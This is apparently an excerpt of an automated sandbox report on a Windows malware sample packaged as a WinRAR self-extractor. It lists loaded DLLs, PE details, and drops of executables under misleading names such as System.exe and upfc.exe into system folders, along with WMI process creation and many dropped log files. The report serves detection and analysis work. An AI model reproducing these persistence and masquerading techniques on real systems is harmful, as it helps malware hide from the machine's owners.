                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: HMhdtzxEHf.exeStatic file information: File size 4000497 > 1048576
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: HMhdtzxEHf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: HMhdtzxEHf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: HMhdtzxEHf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: HMhdtzxEHf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: HMhdtzxEHf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: HMhdtzxEHf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeFile created: C:\ChainbrowserNet\__tmp_rar_sfx_access_check_6411953Jump to behavior
                                    Source: HMhdtzxEHf.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F640 push ecx; ret 0_2_00A4F653
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4EB78 push eax; ret 0_2_00A4EB96
                                    Source: C:\ChainbrowserNet\serverDll.exeCode function: 4_2_00007FFD9BAA4766 push edi; iretd 4_2_00007FFD9BAA4770
                                    Source: C:\ChainbrowserNet\serverDll.exeCode function: 4_2_00007FFD9BE6812B push ebx; ret 4_2_00007FFD9BE6816A

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\dkLAftUN.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LQcCJUsI.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\HBQeAgEO.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\yCaEfIsj.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LxFcNPnz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\jRHPiNPQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\xEzwJIdo.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeFile created: C:\ChainbrowserNet\serverDll.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LazCtHLF.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\oHiYBjVt.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\HQmlqEFC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\hYrhxRdS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\diBqqUdY.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\BnGVmWDc.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\zUjwmmDb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\zkTmQnyh.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\WBUJbbcm.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\axWajGSg.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\UaZkrFKp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\JYydAytP.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\riqoYKNp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\IkuUPlxR.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\OqULzLYx.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\NYMTshMF.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\biYRKJQS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\THRskbyw.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\qHLxhtiz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\NGFBdMTC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\Default\Videos\System.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\hzjriePQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\aBvrGPVb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\nQUGZwiG.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\ChainbrowserNet\backgroundTaskHost.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\OQqtADLy.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\uhRxJqon.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Windows\Vss\Writers\Application\upfc.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\ermiNMVU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\YxtBDwFZ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\fknZLDhU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\XpYRNoYk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\oOwOvwxB.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\hrAYEvpK.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\WcMTNoOk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\FEoVfgpT.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\rEmFCtxu.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\sNXxZlqq.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\kOiXENdL.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\LVZlWyIJ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Recovery\Memory Compression.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Windows\Vss\Writers\Application\upfc.exeJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\jRHPiNPQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\kOiXENdL.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\THRskbyw.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\JYydAytP.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\zkTmQnyh.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\qHLxhtiz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\hYrhxRdS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\XpYRNoYk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\NGFBdMTC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\xEzwJIdo.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\nQUGZwiG.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\diBqqUdY.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\LVZlWyIJ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\BnGVmWDc.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\rEmFCtxu.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\axWajGSg.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\IkuUPlxR.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\yCaEfIsj.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\oOwOvwxB.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\fknZLDhU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\WBUJbbcm.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\NYMTshMF.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LQcCJUsI.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\OQqtADLy.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\ermiNMVU.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LazCtHLF.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\sNXxZlqq.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\aBvrGPVb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\hzjriePQ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\FEoVfgpT.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\UaZkrFKp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\hrAYEvpK.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\HBQeAgEO.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\WcMTNoOk.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\uhRxJqon.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\zUjwmmDb.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\OqULzLYx.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\riqoYKNp.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\LxFcNPnz.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\oHiYBjVt.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\biYRKJQS.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\HQmlqEFC.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\YxtBDwFZ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile created: C:\Users\user\Desktop\dkLAftUN.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
